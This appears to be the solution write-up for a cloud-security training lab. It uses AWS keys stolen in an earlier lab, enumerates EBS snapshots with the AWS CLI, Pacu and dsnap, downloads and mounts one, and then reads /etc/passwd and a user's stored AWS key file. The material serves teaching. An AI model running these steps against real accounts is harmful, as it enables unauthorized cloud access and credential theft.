BAWS 02 – Lab 2 – Solution

Using the aws configure, we set up the AWS keys of the AWS account previously compromised in Lab 1. As we don’t know the region name, keep the default (us-east-1)

aws configure


We then execute the AWS caller identity command in order to retrieve the UserID, Username, and the Account ID.

 aws sts get-caller-identity


From the output we can observe that we have tomas access keys and the Account ID is 999143725571.

Based on the tomasnotes file (Lab 1), it’s seems that tomas is waiting for his EBS Snapshot to be ready. In other words, he is waiting for an EC2 volume to be backed up.

Since we don’t know the region name, let’s execute our first attempt to discover EC2 snapshots in the “us-east-1” region. (Subsequently we can try one by one all 32 AWS regions.)

It should be noted that the –owner-id is the AccountID that we found before and is required in order to be able to retrieve only the snapshots available for our account id.

aws ec2 describe-snapshots --region us-east-1 --owner-id 999143725571


We are not authorised to perform describe-snapshots in region us-east-1

Second attempt to discover EC2 snapshot in the “us-east-2” region returns snapshots details.

aws ec2 describe-snapshots --region us-east-2 --owner-id 999143725571


Enumeration can also be done automatically using a tool such as Pacu. Open a new tab on your terminal, go to Tools/pacu and run the Then press 0 to create a New Session, name it tomasebs and press enter.

cd Desktop/Tools/pacu


Then import your existing AWS keys into pacu and run ebs module enumeration:

> import_keys --all
> run ebs__enum_volumes_snapshots --account-ids 999143725571 


The snapshot has been found. Another powerful tool for downloading and enumerating EBS snapshots is dsnap by Rhino Security.

dsnap --region us-east-2 list


Then download the snapshot:

dsnap --region us-east-2 get snap-05093cd5707afde19

It should be noted that the snapshot is 8 GB and will take some time to be downloaded.


After downloading the snapshot, navigate to Desktop/Tools/dsnap/ and run the following command to run it in a docker. (It will take some time to mount it):

cd Desktop/Tools/dsnap
sudo IMAGE=home/cb8000/snap-05093cd5707afde19.img make docker/run

Searching through the snapshots, user account “tomas_sysadmin” caught our attention. Probing through the user’s home directory revealed a set of AWS keys we can utilise later on.

><fs> cat /etc/passwd 


Enumerating the tomas_sysadmin home directory we ended up on AWS keys.

ls /home/tomas_sysadmin
ls /home/tomas_sysadmin/mykeys
cat /home/tomas_sysadmin/mykeys/mykeys.txt